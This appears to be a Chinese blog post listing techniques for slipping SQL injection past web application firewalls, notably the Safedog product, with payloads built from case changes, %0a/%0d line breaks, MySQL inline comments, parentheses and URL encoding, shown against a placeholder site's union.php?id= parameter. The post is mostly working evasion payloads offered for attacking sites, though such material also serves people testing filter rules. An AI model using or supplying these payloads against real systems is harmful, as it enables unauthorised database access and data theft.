俗话说只要思路宽,绕狗绕的欢。前段时间我有尝试着用以下的方法绕狗,效果还不错。不过这方法呢也许这段时间可以绕过,过段时间可能就失效了,大家还是要多去尝试找到更多的方法。

举例-->整型注入 绕过WAF

绕过方法:

  • 就是修改大小写 加%0a 或%0d去绕过(%0a是换行,%0d是回车) 如: and 1=1   可能会被过滤可改为  /*%0Aand%0a*/ 1=1  或  and 'a' in('a','b') 或  /*%0AaNd%0A*/ 1=1
  • Order by 7 可改为 group by 7 或group by (7)去绕过
  • 加括号去尝试         id=-1 union select 1,2,3 可改为    id=-1 union (((select (1),2,3)))

加+ - ! @ 去尝试    id=-1 union select +或者@或者!或者- 1,2,3

加%0a换行)            id=-1 union %0a select %0a 1,2,3

绕过安全狗:

  • And 可用 url编码%26表示
  • 加内联 和数字去绕过 如:http://www.xxx.com/union.php?id=-1 /*!union/*!44322/*!22322select*/ 1,2,3,4
  • 每个词前加它/*%!a*/ 就是干扰  如:http://www.xxx.com/union.php?id=-1 union/*%!a*/select/*%!a*/1,2,3,4

最新文章

  1. GOLANG 注释
  2. treeGrid树形数据表格的json数据格式说明
  3. Navicat Premium11.0.20破解版快速安装配置(附文件)
  4. extern 相关
  5. express中使用 connect-flash 及其源码研究
  6. Interface的多层继承
  7. 利用纯java捕获和播放音频
  8. CDH5 安装过程
  9. 【转】求质数算法的N种境界
  10. Mysql net start mysql启动,提示发生系统错误 5 拒绝访问,原因所在以及解决办法
  11. 老司机和你深聊 Kubenertes 资源分配之 Request 和 Limit 解析
  12. 201521123037 《Java程序设计》第12周学习总结
  13. 【Learning】 多项式的相关计算
  14. elementui+vue修改elementUi默认样式不生效
  15. SpringCloud调用服务原理
  16. DES加密模式详解
  17. 【校招面试 之 网络】第2题 TCP的可靠传输、流量控制、滑动窗口
  18. 从裸机编程到嵌入式Linux编程思想的转变------分而治之:驱动和应用程序
  19. Unity游戏AI记录(2d横板为例)
  20. python 导出mongoDB数据中的数据

热门文章

  1. Dictionary CovertTo List
  2. S5700的Eth-Trunk端口汇聚(trunk实验)
  3. soapui 调用wsdl 步骤以及出现的问题
  4. 【转】MaBatis学习---源码分析MyBatis缓存原理
  5. jqery-easyui的Datagrid的介绍-Pagination事件
  6. 模拟的confirm
  7. 联想笔记本BIOS设置中文详解
  8. 13.1SolrCloud集群使用手册之Collections API
  9. 6.Solr4.10.3API使用(CURD)
  10. Android (争取做到)最全的底部导航栏实现方法